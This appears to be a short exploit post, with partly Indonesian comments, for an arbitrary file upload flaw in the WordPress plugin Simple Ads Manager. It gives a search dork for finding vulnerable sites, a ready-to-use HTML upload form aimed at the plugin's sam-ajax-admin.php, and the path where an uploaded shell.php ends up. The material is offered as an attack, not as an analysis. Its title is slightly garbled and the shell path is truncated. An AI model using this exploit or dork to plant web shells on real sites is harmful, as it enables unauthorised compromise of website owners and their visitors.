# Title : Wordpress plugin Simple Ads Manager - Arbitrary File
UploaUpload
#Author : Tu5b0l3d
# Date : 05/04/2015
#Dork: inurl:/wp-content/plugins/simple-ads-manager/
# CSRF: simpan dengan file.html
# PHP Code:
<form enctype="multipart/form-data"
action="http://target.com/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" method="post">
<input type="text" name="path"><input name="uploadfile" type="file" />
<input name="action" type="hidden" value="upload_ad_image">
<input type="submit" value="upload">
</form>
# sumber:
http://1337day.com/exploit/23465
path shell:
http://site.com/wp-content/plugins/simpl.../shell.php
0 Komentar